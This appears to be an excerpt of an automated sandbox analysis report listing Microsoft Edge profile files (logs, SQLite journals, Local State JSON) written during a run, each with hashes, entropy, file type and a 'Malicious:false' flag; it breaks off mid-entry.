                                                                                                                                                                                                                                                                                      SHA-512:973882D7E57CF18DE396ABE4370479C11FBC4969884437212E282B278574C1093C3D7440AECBD587821858D2E7009E7597620CB3ACD72567A9DC121BFA83365C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:..-.............M.......#p..{ko.$J...V.......^....-.............M.......#p..{ko.$J...V.......^..........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):317272
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8908053159524186
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:q18JJbhM7ULIHq+saRaV/18Jjv8syry8LyByROy1xyWP:XZ
                                                                                                                                                                                                                                                                                      MD5:C6CC475EF4C7EF244CF74A4A0D0A2BD2
                                                                                                                                                                                                                                                                                      SHA1:B4DF42B5DC4DA2A5BA72C01F2F2B613773F288F0
                                                                                                                                                                                                                                                                                      SHA-256:1187D5FEC7B449AB681DCB47BDBFDE6FBF41D47C0AB3C6E2FDAB617770FAC9AB
                                                                                                                                                                                                                                                                                      SHA-512:FD52F5BB5824C72710FA5DE3664D16AD88950B85AEE124B671815E5772EF23CD30A91C66C6861543A38F09A50D5AF0811E6F08D58227C1F13B67FEE2F6D1D3A3
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:7....-..........$J...V....M7'.z.........$J...V..h.IR..4.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):694
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.56802872697163
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:p9lc8QyOuuuuuuuuuuuuuuuuuuuuuudllH/J8U:pHayalH/P
                                                                                                                                                                                                                                                                                      MD5:85532A01CE68960FFE32D45278284B73
                                                                                                                                                                                                                                                                                      SHA1:56EF810108FCD1B02779ADE4E2BCF7A036FBFABD
                                                                                                                                                                                                                                                                                      SHA-256:FDFE5535FBF58911EC6554E1076116F78D9497AE324120F60AF06CFA68A928A2
                                                                                                                                                                                                                                                                                      SHA-512:1589A4EA82E431CFB5EC6DC438CD41A1634DF2814504BFA93709F4490C2BD2338D50CFB771B83B1B2D078A708AD43FC2C4273A6E3AD66E40E42D94B51439B8F3
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:A..r.................20_1_1...1.,U.................20_1_1...1..$.0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............% ..;...............#38_h.......6.Z..W.F.....NB......NB...........V.e................V.e.................i.O0................39_config..........6.....n ....1

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):328
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.20676924869017
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQw4cL4q2PN723oH+TcwtfrK+IFUt8YIQw4cLJZmw+YIQwRKDkwON723oH+Tcwf:oQwkvVaYeb23FUt8rQwF/+rQwR05OaYq
                                                                                                                                                                                                                                                                                      MD5:3A2A53E956F0BC7AD2C4230A33F3C6E2
                                                                                                                                                                                                                                                                                      SHA1:D23AC7F97D68EB9D2ADDDD9CD9080D514BB75946
                                                                                                                                                                                                                                                                                      SHA-256:7F4D1148173A04825E838835D683263974C27C4A0C0C58B37BE8FBA9D60CC5AE
                                                                                                                                                                                                                                                                                      SHA-512:C2EE211043A43DBE6DC8A9C2AA22C9249F50F031A6AF78FCB27C101F4D83D9E6098CB71BCF53083D69DF506954C97CE3F33E1BE302762CA0D3077E5C1DA7CB58
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:32.399 1f84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/20-04:54:32.399 1f84 Recovering log #3.2024/11/20-04:54:32.400 1f84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):328
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.20676924869017
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQw4cL4q2PN723oH+TcwtfrK+IFUt8YIQw4cLJZmw+YIQwRKDkwON723oH+Tcwf:oQwkvVaYeb23FUt8rQwF/+rQwR05OaYq
                                                                                                                                                                                                                                                                                      MD5:3A2A53E956F0BC7AD2C4230A33F3C6E2
                                                                                                                                                                                                                                                                                      SHA1:D23AC7F97D68EB9D2ADDDD9CD9080D514BB75946
                                                                                                                                                                                                                                                                                      SHA-256:7F4D1148173A04825E838835D683263974C27C4A0C0C58B37BE8FBA9D60CC5AE
                                                                                                                                                                                                                                                                                      SHA-512:C2EE211043A43DBE6DC8A9C2AA22C9249F50F031A6AF78FCB27C101F4D83D9E6098CB71BCF53083D69DF506954C97CE3F33E1BE302762CA0D3077E5C1DA7CB58
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:32.399 1f84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/20-04:54:32.399 1f84 Recovering log #3.2024/11/20-04:54:32.400 1f84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):816
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.0647916882227655
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
                                                                                                                                                                                                                                                                                      MD5:3BE72D8D40752B3A97028FDB2931FABA
                                                                                                                                                                                                                                                                                      SHA1:A27EA4726857A948F0A4B074062B674469A9A371
                                                                                                                                                                                                                                                                                      SHA-256:3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
                                                                                                                                                                                                                                                                                      SHA-512:8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):346
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.217599601528288
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQwG54q2PN723oH+TcwtfrzAdIFUt8YIQw0SJZmw+YIQw0SDkwON723oH+TcwtS:oQwGavVaYeb9FUt8rQwJ/+rQwD5OaYe+
                                                                                                                                                                                                                                                                                      MD5:79C423ACFBB89CB952199810392ABA7B
                                                                                                                                                                                                                                                                                      SHA1:73C284410E850DE4C41F54DAEA974AD864CFBE37
                                                                                                                                                                                                                                                                                      SHA-256:1F843706E64FE22EE24E1DAEB810965307A38A4A86377433094C747D9BE21EEC
                                                                                                                                                                                                                                                                                      SHA-512:C6C60BFBDA48370415678B8F0D030DCE74AFF8EF6371F39ACAC1C4B3BD58AE9827C4FD86E1498E8980C0E637A925486F413B6470C4E6A280466CACEA012871F5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:32.365 1f84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/20-04:54:32.395 1f84 Recovering log #3.2024/11/20-04:54:32.395 1f84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):346
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.217599601528288
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQwG54q2PN723oH+TcwtfrzAdIFUt8YIQw0SJZmw+YIQw0SDkwON723oH+TcwtS:oQwGavVaYeb9FUt8rQwJ/+rQwD5OaYe+
                                                                                                                                                                                                                                                                                      MD5:79C423ACFBB89CB952199810392ABA7B
                                                                                                                                                                                                                                                                                      SHA1:73C284410E850DE4C41F54DAEA974AD864CFBE37
                                                                                                                                                                                                                                                                                      SHA-256:1F843706E64FE22EE24E1DAEB810965307A38A4A86377433094C747D9BE21EEC
                                                                                                                                                                                                                                                                                      SHA-512:C6C60BFBDA48370415678B8F0D030DCE74AFF8EF6371F39ACAC1C4B3BD58AE9827C4FD86E1498E8980C0E637A925486F413B6470C4E6A280466CACEA012871F5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:32.365 1f84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/20-04:54:32.395 1f84 Recovering log #3.2024/11/20-04:54:32.395 1f84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):120
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                      MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                      SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                      SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                      SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):13
                                                                                                                                                                                                                                                                                      Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                                                                                      MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                                                                                      SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                                                                                      SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                                                                                      SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:117.0.2045.55

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):44455
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.089760054496682
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW8di1zNtPMnkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynogkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                      MD5:A9C011CEE03B0F16594FC2003BC38212
                                                                                                                                                                                                                                                                                      SHA1:C67FBB984FE23B4DD865499EE1BBBFD74F691B5C
                                                                                                                                                                                                                                                                                      SHA-256:B600D612543AAFA9C256BFB8A8944D26A9F19433F62B28309C4FD73410E3E39E
                                                                                                                                                                                                                                                                                      SHA-512:02EA2B071E84B42CF38405B9D1F93C6326BB6DB196036A4DC76055BF2E6475C3772DABCAD9A473BF32A0C618495A0863C0393359E6972EF57F7B817D524C9165
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a394.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):44455
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.089760054496682
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW8di1zNtPMnkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynogkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                      MD5:A9C011CEE03B0F16594FC2003BC38212
                                                                                                                                                                                                                                                                                      SHA1:C67FBB984FE23B4DD865499EE1BBBFD74F691B5C
                                                                                                                                                                                                                                                                                      SHA-256:B600D612543AAFA9C256BFB8A8944D26A9F19433F62B28309C4FD73410E3E39E
                                                                                                                                                                                                                                                                                      SHA-512:02EA2B071E84B42CF38405B9D1F93C6326BB6DB196036A4DC76055BF2E6475C3772DABCAD9A473BF32A0C618495A0863C0393359E6972EF57F7B817D524C9165
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a549.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):44455
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.089760054496682
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW8di1zNtPMnkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynogkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                      MD5:A9C011CEE03B0F16594FC2003BC38212
                                                                                                                                                                                                                                                                                      SHA1:C67FBB984FE23B4DD865499EE1BBBFD74F691B5C
                                                                                                                                                                                                                                                                                      SHA-256:B600D612543AAFA9C256BFB8A8944D26A9F19433F62B28309C4FD73410E3E39E
                                                                                                                                                                                                                                                                                      SHA-512:02EA2B071E84B42CF38405B9D1F93C6326BB6DB196036A4DC76055BF2E6475C3772DABCAD9A473BF32A0C618495A0863C0393359E6972EF57F7B817D524C9165
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3cc3a.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):44455
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.089760054496682
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW8di1zNtPMnkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynogkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                      MD5:A9C011CEE03B0F16594FC2003BC38212
                                                                                                                                                                                                                                                                                      SHA1:C67FBB984FE23B4DD865499EE1BBBFD74F691B5C
                                                                                                                                                                                                                                                                                      SHA-256:B600D612543AAFA9C256BFB8A8944D26A9F19433F62B28309C4FD73410E3E39E
                                                                                                                                                                                                                                                                                      SHA-512:02EA2B071E84B42CF38405B9D1F93C6326BB6DB196036A4DC76055BF2E6475C3772DABCAD9A473BF32A0C618495A0863C0393359E6972EF57F7B817D524C9165
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                      MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                      SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
